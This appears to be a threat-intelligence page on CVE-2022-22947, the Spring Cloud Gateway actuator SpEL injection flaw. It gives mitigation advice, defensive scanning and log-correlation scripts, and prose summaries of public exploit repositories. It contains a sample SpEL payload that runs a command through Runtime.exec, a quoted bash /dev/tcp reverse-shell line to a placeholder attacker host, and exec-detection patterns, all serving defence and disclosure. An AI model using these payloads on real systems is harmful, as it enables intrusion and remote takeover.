Spring Cloud Gateway Actuator Code Injection RCE
CVE-2022-22947 is a remote code execution vulnerability in Spring Cloud Gateway. Applications are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed, and unsecured. A remote, unauthenticated attacker can POST a route definition to /actuator/gateway/routes/{id} whose filter arguments contain a SpEL (Spring Expression Language) expression; the expression is evaluated when the gateway rebuilds its routes, which the attacker forces with a POST to /actuator/gateway/refresh, giving arbitrary code execution on the target host. The issue affects Spring Cloud Gateway 3.0.0 through 3.0.6 and 3.1.0, fixed in 3.0.7 and 3.1.1 respectively; older, unsupported versions are also affected.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they've been doing with it: anyone who can reach the unsecured gateway actuator endpoint gets arbitrary command execution as the gateway's JVM user, with no authentication. The public exploits below go past single commands to reverse shells and memory-resident webshells (Godzilla, Netty-handler and Spring request-mapping memshells) that leave nothing on disk, and the bug has been abused by botnet campaigns.
Mitigation
If you can't patch tonight, do this now: disable the gateway actuator endpoint if you do not need it (management.endpoint.gateway.enabled=false), and if you do need it, put it behind Spring Security and bind management endpoints to a port and network the internet cannot reach. Also narrow management.endpoints.web.exposure.include to the endpoints you actually use; the PoC applications below are exploitable precisely because they expose everything.
Remediation
Patch, then assume compromise: upgrade to Spring Cloud Gateway 3.0.7 or 3.1.1 (or later), then list the routes with GET /actuator/gateway/routes and delete any you did not define, because several of the exploits below leave their route in place. Deleting a route and refreshing does not evict an injected memory shell, which lives only in the running JVM, so restart the process as well, and review access logs for POSTs to /actuator/gateway/routes/<id> followed by /actuator/gateway/refresh from the same client.
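Two of those checks can be scripted. The following is an added example written for this page, not code from Mallory or from any of the repositories listed below: it compares a Spring Cloud Gateway version string against the fixed releases, and it walks a route dump for SpEL templates planted in filter arguments, grading a hit as critical when the expression reaches java.lang.Runtime or ProcessBuilder. The sample route list is constructed in the RouteDefinition shape (id, uri, predicates, filters with name/args), which is the form the exploits POST; the scanner walks every string in each route object rather than trusting a field layout, so it can be pointed at whatever your gateway's actuator returns for its route definitions.

```python
"""Offline checks for CVE-2022-22947: version exposure and leftover injected routes.

Added example for this page; not code from Mallory or from any exploit repository.
"""
import json
import re

# Fixed releases: 3.0.7 closes the 3.0.x line and 3.1.1 the 3.1.x line.
FIXED = {(3, 0): (3, 0, 7), (3, 1): (3, 1, 1)}

# '#{...}' is the SpEL template syntax that a vulnerable gateway evaluates in
# shortcut filter args on refresh; T(java.lang.Runtime) / .exec( is the shape
# of every public payload.
SPEL_TEMPLATE = re.compile(r"#\{")
EXEC_MARKERS = re.compile(
    r"T\(\s*java\.lang\.(?:Runtime|ProcessBuilder)|getRuntime\(\)|\.exec\("
)


def parse_version(version: str) -> tuple:
    """'3.0.6', '3.1.0-SNAPSHOT' or '2.2.10.RELEASE' -> (major, minor, patch)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if m is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable_version(version: str) -> bool:
    """True for 3.0.0-3.0.6, 3.1.0, and anything below 3.0.0 (unsupported lines never got a fix)."""
    v = parse_version(version)
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return v < (3, 0, 0)  # 3.2 and later shipped after the fix
    return v < fixed


def _strings(obj):
    """Yield every string nested anywhere in a decoded JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _strings(value)


def find_injected_routes(routes: list) -> list:
    """One finding per route whose definition carries a SpEL template.

    Walks every string in the route object, so the field layout does not matter.
    Severity is 'critical' when the expression reaches Runtime/ProcessBuilder.
    """
    findings = []
    for route in routes:
        route_id = route.get("route_id") or route.get("id") or "<unknown>"
        for text in _strings(route):
            if SPEL_TEMPLATE.search(text):
                findings.append({
                    "route_id": route_id,
                    "severity": "critical" if EXEC_MARKERS.search(text) else "suspicious",
                    "value": text,
                })
                break  # one finding per route is enough to act on
    return findings


# Constructed sample (not captured from a real host): a benign route, then the
# kind of route the public exploits add, an AddResponseHeader filter whose
# value is a SpEL template running `id`.
SAMPLE_ROUTES = json.loads(r'''
[
  {"id": "orders", "uri": "lb://orders-service", "order": 0,
   "predicates": [{"name": "Path", "args": {"_genkey_0": "/orders/**"}}],
   "filters": [{"name": "AddResponseHeader", "args": {"name": "X-Gateway", "value": "edge"}}]},
  {"id": "hacktest", "uri": "http://example.com", "order": 0,
   "predicates": [{"name": "Path", "args": {"_genkey_0": "/hacktest"}}],
   "filters": [{"name": "AddResponseHeader",
                "args": {"name": "Result",
                         "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}]}
]
''')


if __name__ == "__main__":
    for v in ("3.0.6", "3.0.7", "3.1.0", "3.1.1", "2.2.10.RELEASE"):
        print(f"{v:16} vulnerable={is_vulnerable_version(v)}")
    for f in find_injected_routes(SAMPLE_ROUTES):
        print(f"[{f['severity']}] route {f['route_id']}: {f['value'][:70]}...")
```

Point find_injected_routes at a json.load of the real actuator response instead of SAMPLE_ROUTES. A critical hit means an attacker got as far as writing a route; treat the host as compromised rather than merely exposed, since the expression runs on the next route reload if it has not already.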
Exploits
21 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (9 hidden).
This repository contains a Python exploit script (CVE-2022-22947.py) and a README.md. The exploit targets CVE-2022-22947, a remote code execution vulnerability in Spring Cloud Gateway's Actuator endpoint. The script allows the user to execute arbitrary system commands or obtain a reverse shell on a vulnerable server by abusing the /actuator/gateway/routes and /actuator/gateway/refresh endpoints. The exploit works by creating a malicious route filter using SpEL injection, triggering a refresh, and then retrieving the command output. The script supports both direct command execution and reverse shell payloads, with the latter requiring the user to input a shell command (e.g., bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1). The README provides usage instructions and describes the affected product versions. The code is operational and can be used to gain remote code execution on unprotected, vulnerable Spring Cloud Gateway instances.
This repository is a proof-of-concept (PoC) application for demonstrating and verifying CVE-2022-22947, a remote code execution vulnerability in Spring Cloud Gateway. The project is a minimal Spring Boot application configured with a vulnerable version of Spring Cloud Gateway (3.1.0) and exposes all Actuator endpoints, including the gateway management endpoints. The README provides detailed exploitation steps: an attacker can POST a malicious route containing a SpEL expression to the /actuator/gateway/routes/test endpoint, refresh the routes via /actuator/gateway/refresh, and then trigger code execution by accessing /test. The provided payload demonstrates launching the Calculator app on macOS, but arbitrary commands could be executed. The repository structure is typical for a Maven-based Java project, with the main application entry point in VulnerableGatewayApplication.java and configuration in application.yml. This PoC is intended for educational and research purposes only and should not be used in production environments.
This repository contains a Python exploit script (CVE-2022-22947.py) targeting the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947). The exploit works by injecting a malicious filter into the gateway's routes via the /actuator/gateway/routes endpoint, then refreshing the configuration and retrieving the output of an arbitrary system command provided by the user. The script interacts with three main endpoints: /actuator/gateway/routes/66Sec (for both adding the malicious route and retrieving results) and /actuator/gateway/refresh (to apply the changes). The exploit requires the target to have the actuator endpoints exposed and accessible. The README provides a brief description and screenshots of successful exploitation. The code is operational and allows for arbitrary command execution, making it a practical exploit for this vulnerability.
This repository contains a Python exploit script targeting CVE-2022-22947 in VMware Spring Cloud Gateway. The exploit leverages exposed actuator endpoints to inject a Java memory shell (memshell) into the target application. The script supports two shell types ('spring' and 'netty'), both of which are injected by sending a crafted, base64-encoded payload to the /actuator/gateway/routes/new_route endpoint. After injection, the /actuator/gateway/refresh endpoint is called to activate the new route. The attacker can then execute arbitrary commands on the target via HTTP requests to the injected shell endpoint (e.g., /GYWA?cmd=whoami). The repository consists of a README.md (with usage instructions and references) and the main exploit script (spring_cloud_gateway_memshell.py). The exploit is operational and provides a working web shell if the target is vulnerable and accessible.
This repository provides a proof-of-concept (PoC) exploit for CVE-2022-22947, a critical vulnerability in Spring Cloud Gateway's Actuator API that allows remote code execution via SpEL injection. The repository contains a Dockerfile to build and run a vulnerable Spring Cloud Gateway instance on port 9000. The README.md details the exploitation steps: sending crafted HTTP requests to the Actuator API to add a route containing a malicious SpEL expression, refreshing the gateway to trigger code execution, retrieving the command output, and cleaning up by deleting the route. The exploit demonstrates execution of arbitrary system commands (e.g., 'id') on the target server. The main attack vector is network-based, targeting the exposed Actuator API endpoints. No actual exploit code is present; the PoC relies on HTTP requests and payloads described in the documentation.
This repository contains a single Java class (GMemShell.java) and a brief README. The Java class implements a memory-resident webshell (memshell) designed to be injected into a vulnerable Spring Cloud Gateway application (targeting CVE-2022-22947). The exploit registers a new HTTP POST endpoint at /cmd, which accepts AES-encrypted, base64-encoded Java class payloads. The attacker can upload a payload, which is loaded and executed in memory, allowing for arbitrary code execution. The code includes cryptographic routines for AES encryption/decryption and base64 encoding/decoding, as well as dynamic class loading via reflection. The README references a blog post describing the injection technique. The exploit is operational and provides a stealthy, in-memory webshell for post-exploitation on vulnerable Java/Spring Cloud Gateway targets.
This repository provides a proof-of-concept exploit for CVE-2022-22947, a code injection vulnerability in VMware's Spring Cloud Gateway. The exploit consists of a single 'Payload' file that outlines a three-step attack: (1) sending a crafted POST request to the /actuator/gateway/routes endpoint to inject a malicious SpEL expression that executes the 'id' command, (2) refreshing the gateway configuration via the /actuator/gateway/refresh endpoint, and (3) retrieving the command output by querying the injected route. The exploit leverages exposed actuator endpoints to achieve remote code execution. The repository also includes a brief README identifying the vulnerability. No framework is used; the exploit is a standalone POC using raw HTTP requests.
This repository provides a Python exploit script (spring-cloud-gateway-rce.py) targeting CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit abuses the Actuator API's /actuator/gateway/routes and /actuator/gateway/refresh endpoints to inject a malicious route containing a SpEL (Spring Expression Language) expression. This expression executes arbitrary system commands on the target server using java.lang.Runtime.exec. The script supports both Linux and Windows targets, allows the attacker to specify arbitrary commands, and can be used to spawn a reverse shell. The README provides usage instructions and examples. The exploit is operational and can be used to gain remote code execution on vulnerable Spring Cloud Gateway instances with exposed Actuator endpoints.
This repository contains a Python exploit (exp.py) targeting CVE-2022-22947, a critical vulnerability in VMware Spring Cloud Gateway's Actuator API that allows SpEL expression injection and remote code execution. The exploit automates the process of injecting a Godzilla memory shell (webshell) into the target application by abusing the AddResponseHeader filter and loading a malicious Java class via a Base64-encoded payload. The exploit works by creating a new route with the malicious payload, refreshing the gateway to apply the route, and then triggering the payload to install the webshell at the /gmem endpoint. The README provides a brief description and references for further information and testing environments. The repository structure is simple, with one main exploit script (exp.py) and a README. The exploit requires the target's Actuator endpoints to be accessible and does not clean up after itself, leaving the malicious route in place unless manually removed.
This repository provides an operational exploit for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The main exploit logic is implemented in Go (main.go) and automates the exploitation process by interacting with the vulnerable management endpoints. The exploit works by adding a new route with a malicious SpEL expression that executes arbitrary system commands, refreshing the gateway to apply the route, retrieving the command output, and then cleaning up by deleting the route and refreshing again. The tool supports both single-target and batch exploitation (via url.txt). The README provides detailed usage instructions and describes the HTTP requests involved. The exploit targets Spring Cloud Gateway instances with exposed /actuator/gateway/routes and /actuator/gateway/refresh endpoints, and is capable of executing arbitrary commands on the target server.
This repository provides an operational exploit for a remote code execution (RCE) vulnerability in Spring Cloud Gateway's actuator endpoints. The main exploit script, 'gateway_rce.py', is written in Python and automates the process of exploiting the vulnerability by creating a malicious route via the '/actuator/gateway/routes' endpoint, which injects a payload for command execution. The script supports several functions: vulnerability detection (by executing 'whoami'), arbitrary command execution, reverse shell via bash and /dev/tcp, outbound network connectivity testing (using www.baidu.com), and uploading/executing a Java-based reverse shell (shell.java). The Java file 'shell.java' is a cross-platform reverse shell that connects back to a specified IP and port, providing an interactive shell to the attacker. The exploit is interactive, requiring the user to input the target URL and select actions. The README provides detailed usage instructions and screenshots. The exploit is not part of a known framework and is intended for manual exploitation of vulnerable Spring Cloud Gateway instances.
This repository provides a working exploit for CVE-2022-22947, a critical remote code execution vulnerability in VMware's Spring Cloud Gateway (versions <3.0.7 and <3.1.1) when the Actuator endpoint is enabled and exposed. The exploit is implemented in Python (exploit.py) and leverages a SpEL (Spring Expression Language) injection via the /actuator/gateway/routes API. The script allows an attacker to execute arbitrary system commands on the target server and retrieve their output. The workflow involves deploying a malicious route, refreshing the gateway, retrieving the command output, and cleaning up by removing the route. The repository includes a README.md with usage instructions and references, the main exploit script (exploit.py), and a requirements.txt for dependencies. The attack vector is network-based, targeting HTTP endpoints exposed by the vulnerable application.
This repository contains a POC/EXP Python script for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway (versions < 3.1.1 and < 3.0.7). The exploit is implemented as a pocsuite3 module, leveraging the framework's API for exploitation. The main script, 'CVE-2022-22947_POC_EXP.py', defines a class that crafts HTTP requests to the vulnerable actuator endpoints of Spring Cloud Gateway. The exploit works by creating a new route with a malicious filter that executes arbitrary system commands via Java's Runtime.exec, then refreshes the gateway, retrieves the command output, and finally deletes the malicious route. The script supports customizable payloads, including reverse shells (nc, bash, powershell). The README provides usage instructions for both verification and exploitation modes. The exploit is operational and can be used to achieve remote code execution on vulnerable targets, provided the actuator endpoints are exposed and accessible.
This repository is a Go-based exploit tool targeting CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit injects a Godzilla memory shell (webshell) into the target application by abusing the /actuator/gateway/routes endpoint. The main functionality is implemented in 'main.go', which parses command-line arguments for the target URL (-u) and an optional proxy (-p). The tool crafts a malicious payload containing a Base64-encoded Java class for the Godzilla memory shell and sends it to the vulnerable endpoint. If successful, it provides persistent remote access to the attacker. The repository is structured simply, with a single Go source file, Go module files, and a README describing usage. The exploit is operational, providing a working payload and proxy support for real-world attacks.
This repository is a proof-of-concept and exploitation toolkit for CVE-2022-22947, a critical remote code execution vulnerability in Spring Cloud Gateway. The exploit leverages the ability to register new routes via the /actuator/gateway/routes/{id} endpoint, injecting a malicious SpEL (Spring Expression Language) payload in the filter configuration. When the /actuator/gateway/refresh endpoint is called, the SpEL is evaluated, leading to arbitrary code execution. The repository includes:
- A detailed README.md explaining the vulnerability, affected versions, exploitation steps, and mitigation.
- Java source files for two types of memory shells: NettyMemShell (injects a Netty handler for command execution via HTTP headers) and SpringRequestMappingMemshell (registers a new request mapping for command execution).
- Example payloads and base64-encoded class files for memory shells.
- A sample Spring Boot application configured to demonstrate the vulnerability.
The exploit requires the target to have the 'gateway' actuator endpoint enabled and exposed. The attacker can then use HTTP POST requests to inject and trigger the payload. The provided memory shells allow persistent access and command execution via HTTP requests. The repository is operational and can be used to demonstrate or further develop exploits for this vulnerability.
This repository contains a single Python exploit script (exp.py) and a README. The exploit targets CVE-2022-22947, a vulnerability in Spring Cloud Gateway that allows unauthenticated remote code execution via the /actuator/gateway/routes API. The script supports injecting three types of memory shells (webshells): Spring, Netty, and Godzilla (哥斯拉). The user specifies the shell type and the target URL. The script crafts a JSON payload containing a base64-encoded Java class for the chosen shell, sends it to the vulnerable endpoint, refreshes the gateway, and provides instructions for accessing the shell. The README provides usage instructions and references. The exploit is operational and provides persistent remote access if successful. No hardcoded IPs or domains are present; the target is specified by the user at runtime.
This repository provides a working exploit for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway (versions <3.1.1 and <3.0.7) when the Actuator API is exposed. The exploit consists of a Python script ('spring_cloud_RCE.py') that automates the attack steps: it sends crafted HTTP requests to the Actuator endpoints to add a malicious route containing a SpEL payload, triggers a refresh to apply the route, retrieves the result of the executed command (default: 'id'), and finally deletes the route to clean up. The exploit leverages the ability to inject SpEL expressions via the Actuator API, resulting in arbitrary command execution on the target server. The repository also includes detailed markdown documentation in both Chinese and English, describing the vulnerability, affected versions, mitigation steps, and manual exploitation steps. The main attack vector is network-based, targeting HTTP endpoints exposed by the vulnerable Spring Cloud Gateway instance.
This repository contains a Python exploit script (CVE-2022-22947.py) targeting the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947). The exploit works by sending crafted HTTP POST requests to the /actuator/gateway/routes and /actuator/gateway/refresh endpoints of a vulnerable Spring Cloud Gateway instance. It injects a malicious filter that executes arbitrary system commands (by default, 'id') and retrieves the output via a custom HTTP response header. The script supports targeting single or multiple URLs and can use a proxy. The repository also includes a README.md with vulnerability details and mitigation advice, and a requirements.txt listing Python dependencies. The main attack vector is network-based, requiring access to the vulnerable actuator endpoints. The exploit is operational, providing real command execution on the target if successful.
This repository contains a Python exploit script (CVE-2022-22947.py) targeting the Spring Cloud Gateway vulnerability CVE-2022-22947. The exploit leverages exposed actuator endpoints to inject a malicious route filter, enabling remote command execution or a reverse shell on the target server. The script provides two main functionalities: executing arbitrary commands and establishing a reverse shell to an attacker-controlled host. The exploit works by sending crafted JSON payloads to the /actuator/gateway/routes and /actuator/gateway/refresh endpoints, then retrieving the command output. The README provides usage instructions for both command execution and reverse shell. The repository is straightforward, with one main exploit script and a brief README, and is operational with hardcoded payloads for exploitation.
This repository provides an operational exploit for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit is implemented in Python (cve-2022-22947.py) and allows an attacker to execute arbitrary system commands on vulnerable Spring Cloud Gateway instances by abusing the /actuator/gateway/routes and /actuator/gateway/refresh endpoints. The script supports both single and batch target modes, as well as reverse shell payloads. The exploit works by creating a malicious route with a filter that executes a base64-encoded command via Java's Runtime.exec, refreshing the routes, and then retrieving the command output. The repository also includes a README with detailed usage instructions and a sample url.txt file for batch testing. The main attack vector is network-based, targeting exposed HTTP endpoints. The exploit is operational, providing real command execution and output retrieval, and is not just a proof of concept.
This repository contains a Python exploit script (CVE-2022-22947.py) targeting CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit works by abusing the actuator API endpoints to create a new route with a malicious filter that executes arbitrary system commands. The command output is returned in a custom HTTP response header ('Result'). The script automates the process of creating the route, triggering the command, retrieving the output, and cleaning up by deleting the route. The only other file is a README.md with basic usage instructions. The exploit requires the target's actuator endpoints to be accessible and is capable of executing arbitrary commands on the target server.
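Every exploit above follows the same three-request choreography: a POST that creates a route under /actuator/gateway/routes/<id>, a POST to /actuator/gateway/refresh, then a GET of the route (or of the planted webshell path). That pairing, from one client inside a short window, is what to alert on in web-server or gateway access logs. The following added example (not from Mallory or from any of the repositories above) implements that correlation over a handful of constructed combined-log-format lines; the five-minute window and the log field layout are the example's assumptions, and nothing here was captured from a real incident.

```python
"""Correlate the CVE-2022-22947 request sequence in HTTP access logs.

Added example for this page; not code from Mallory or from any exploit repository.
The log lines below are constructed, and the correlation window is an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined/common log format: client ip, identd, user, [timestamp], "request line", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ROUTE_WRITE = re.compile(r"^/actuator/gateway/routes/(?P<id>[^/?]+)$")
REFRESH_PATH = "/actuator/gateway/refresh"
WINDOW = timedelta(minutes=5)  # assumption: the exploit scripts fire all requests within seconds


def parse_line(line: str):
    """Decode one access-log line, or return None for lines that are not requests."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def _alert(ip, route_id, confidence, reason):
    return {"ip": ip, "route_id": route_id, "confidence": confidence, "reason": reason}


def detect(lines, window=WINDOW) -> list:
    """Return alerts; highest confidence for a successful route write followed by a refresh.

    high   : POST/PUT /actuator/gateway/routes/<id> returned 2xx and the same client
             POSTed /actuator/gateway/refresh within the window (exploit completed).
    medium : successful route write with no refresh seen; the planted definition is
             still evaluated on the next route reload, whatever triggers it.
    low    : route write rejected (401/403/404...), i.e. somebody probing for the endpoint.
    """
    writes = defaultdict(list)  # client ip -> [(ts, route_id)] of successful writes
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts, method, path, status = ev["ip"], ev["ts"], ev["method"], ev["path"], ev["status"]
        m = ROUTE_WRITE.match(path)
        if m is not None and method in ("POST", "PUT"):
            if 200 <= status < 300:
                writes[ip].append((ts, m.group("id")))
            else:
                alerts.append(_alert(ip, m.group("id"), "low",
                                     f"route write rejected with HTTP {status}"))
        elif path == REFRESH_PATH and method == "POST":
            matched = [w for w in writes[ip] if timedelta(0) <= ts - w[0] <= window]
            for _, route_id in matched:
                alerts.append(_alert(ip, route_id, "high",
                                     "actuator route write followed by gateway refresh"))
            writes[ip] = [w for w in writes[ip] if w not in matched]
    for ip, pending in writes.items():
        for _, route_id in pending:
            alerts.append(_alert(ip, route_id, "medium",
                                 "actuator route written, no refresh seen in window"))
    return alerts


# Constructed sample: a health probe, a full exploit run (create, refresh, read back,
# delete) from one client, and a rejected write from another.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2022:09:14:02 +0000] "GET /actuator/health HTTP/1.1" 200 15
203.0.113.7 - - [10/Mar/2022:09:15:31 +0000] "POST /actuator/gateway/routes/hacktest HTTP/1.1" 201 0
203.0.113.7 - - [10/Mar/2022:09:15:32 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
203.0.113.7 - - [10/Mar/2022:09:15:33 +0000] "GET /actuator/gateway/routes/hacktest HTTP/1.1" 200 312
203.0.113.7 - - [10/Mar/2022:09:15:34 +0000] "DELETE /actuator/gateway/routes/hacktest HTTP/1.1" 200 0
198.51.100.20 - - [10/Mar/2022:09:40:10 +0000] "POST /actuator/gateway/routes/x HTTP/1.1" 401 0
""".splitlines()


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"[{a['confidence']:6}] {a['ip']} route={a['route_id']}: {a['reason']}")
```

Note that the cleanup DELETE in the sample does not lower the alert: the command already ran at refresh time, and several of the exploits above plant a memory shell that a route delete does not remove, so the high-confidence pair should page someone regardless of what the client did afterwards.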
Affected products & vendors
Vendor-confirmed product mapping: Spring Cloud Gateway (VMware / Spring) 3.0.0 through 3.0.6 and 3.1.0, with the fix in 3.0.7 and 3.1.1; older, unsupported versions are also affected. Any application that embeds spring-cloud-starter-gateway at one of those versions inherits the flaw, so check version ranges at the dependency level, not only against the CPE.
Recent activity
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote code execution vulnerability in Spring Cloud Gateway referenced in the context of Spring Boot actuator and gateway-related detection.
Listed among the vulnerabilities additionally targeted by a botnet campaign; the source gives no further detail.
A remote code execution vulnerability in Spring Cloud Gateway that is being abused in botnet attacks.
Critical unauthenticated remote code execution vulnerability in Spring Cloud Gateway via the gateway actuator endpoints (/actuator/gateway/routes and /actuator/gateway/refresh).